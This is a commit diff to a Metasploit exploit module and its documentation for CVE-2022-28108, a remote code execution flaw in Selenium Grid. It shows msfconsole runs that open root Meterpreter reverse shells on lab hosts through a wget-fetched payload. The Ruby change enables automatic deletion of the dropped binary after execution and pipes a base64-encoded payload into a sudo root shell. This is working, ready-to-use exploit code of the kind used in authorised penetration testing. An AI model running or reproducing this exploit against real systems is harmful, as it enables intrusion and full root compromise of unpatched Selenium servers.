Minor improve

 * enable fetch_delete
 * avoid using single quotes
 * update doc

Author: Takahiro-Yoko

documentation/modules/exploit/linux/http/selenium_greed_chrome_rce_cve_2022_28108.md

@@ -1,6 +1,6 @@
 ## Vulnerable Application
 
-Selenium Server (Grid) before 4 allows CSRF because it permits non-JSON content types
+Selenium Server (Grid) before 4.0.0-alpha-7 allows CSRF because it permits non-JSON content types
 such as application/x-www-form-urlencoded, multipart/form-data, and text/plain.
 
 The vulnerability affects:
@@ -9,8 +9,8 @@ The vulnerability affects:
 
 This module was successfully tested on:
 
-    * selenium/standalone-chrome:3.141.59 installed with Docker on Ubuntu 20.0.4
-    * selenium/standalone-chrome:4.0.0-alpha-6-20200730 installed with Docker on Ubuntu 20.0.4
+    * selenium/standalone-chrome:3.141.59 installed with Docker on Ubuntu 24.04
+    * selenium/standalone-chrome:4.0.0-alpha-6-20200730 installed with Docker on Ubuntu 24.04
 
 
 ### Installation
@@ -33,6 +33,7 @@ This module was successfully tested on:
 
 
 ## Scenarios
+### selenium/standalone-chrome:3.141.59 installed with Docker on Ubuntu 24.04
 ```
 msf6 > use exploit/linux/http/selenium_greed_chrome_rce_cve_2022_28108
 [*] Using configured payload cmd/linux/http/x64/meterpreter_reverse_tcp
@@ -54,8 +55,8 @@ Payload options (cmd/linux/http/x64/meterpreter_reverse_tcp):
    Name                Current Setting  Required  Description
    ----                ---------------  --------  -----------
    FETCH_COMMAND       WGET             yes       Command to fetch payload (Accepted: CURL, FTP, TFTP, TNFTP, WGET)
-   FETCH_DELETE        false            yes       Attempt to delete the binary after execution
-   FETCH_FILENAME      KPrNrswF         no        Name to use on remote system when storing payload; cannot contain spaces or slashes
+   FETCH_DELETE        true             yes       Attempt to delete the binary after execution
+   FETCH_FILENAME      jcInmtImuA       no        Name to use on remote system when storing payload; cannot contain spaces or slashes
    FETCH_SRVHOST                        no        Local IP to use for serving payload
    FETCH_SRVPORT       8080             yes       Local port to use for serving payload
    FETCH_URIPATH                        no        Local URI to use for serving payload
@@ -74,20 +75,38 @@ Exploit target:
 
 View the full module info with the info, or info -d command.
 
-msf6 exploit(linux/http/selenium_greed_chrome_rce_cve_2022_28108) > run lhost=192.168.56.1 rhost=192.168.56.16
+msf6 exploit(linux/http/selenium_greed_chrome_rce_cve_2022_28108) > run lhost=192.168.56.1 rhost=192.168.56.16 rport=4444 ForceExploit=true
 [*] Started reverse TCP handler on 192.168.56.1:4444 
 [*] Running automatic check ("set AutoCheck false" to disable)
-[*] Version 3.141.59 detected, which is vulnerable
-[+] The target appears to be vulnerable.
-[*] Meterpreter session 1 opened (192.168.56.1:4444 -> 192.168.56.16:58562) at 2024-12-28 11:15:06 +0900
+[+] The target appears to be vulnerable. Version 3.141.59 detected, which is vulnerable
+[*] Meterpreter session 1 opened (192.168.56.1:4444 -> 192.168.56.16:46564) at 2024-12-29 12:14:52 +0900
 
 meterpreter > getuid
 Server username: root
 meterpreter > sysinfo
-Computer     : 172.17.0.2
+Computer     : 172.17.0.4
 OS           : Ubuntu 20.04 (Linux 6.8.0-51-generic)
 Architecture : x64
 BuildTuple   : x86_64-linux-musl
 Meterpreter  : x64/linux
 meterpreter > 
 ```
+
+### selenium/standalone-chrome:4.0.0-alpha-6-20200730 installed with Docker on Ubuntu 24.04
+```
+msf6 exploit(linux/http/selenium_greed_chrome_rce_cve_2022_28108) > run lhost=192.168.56.1 rhost=192.168.56.16 rport=4447 ForceExploit=true
+[*] Started reverse TCP handler on 192.168.56.1:4444 
+[*] Running automatic check ("set AutoCheck false" to disable)
+[!] Cannot reliably check exploitability. ForceExploit is enabled, proceeding with exploitation.
+[*] Meterpreter session 2 opened (192.168.56.1:4444 -> 192.168.56.16:59162) at 2024-12-29 12:15:49 +0900
+
+meterpreter > getuid
+Server username: root
+meterpreter > sysinfo
+Computer     : 172.17.0.5
+OS           : Ubuntu 18.04 (Linux 6.8.0-51-generic)
+Architecture : x64
+BuildTuple   : x86_64-linux-musl
+Meterpreter  : x64/linux
+meterpreter > 
+```

modules/exploits/linux/http/selenium_greed_chrome_rce_cve_2022_28108.rb

@@ -44,6 +44,9 @@ def initialize(info = {})
             }
           ],
         ],
+        'DefaultOptions' => {
+          'FETCH_DELETE' => true
+        },
         'DefaultTarget' => 0,
         'DisclosureDate' => '2022-04-18',
         'Notes' => {
@@ -86,7 +89,7 @@ def check
   def exploit
     b64encoded_payload = Rex::Text.encode_base64(
       "if sudo -n true 2>/dev/null; then\n"\
-      "  sudo su root -c '#{payload.encoded}'\n"\
+      "  echo #{Rex::Text.encode_base64(payload.encoded)} | base64 -d | sudo su root -c /bin/bash\n"\
       "else\n"\
       "  #{payload.encoded}\n"\
       "fi\n"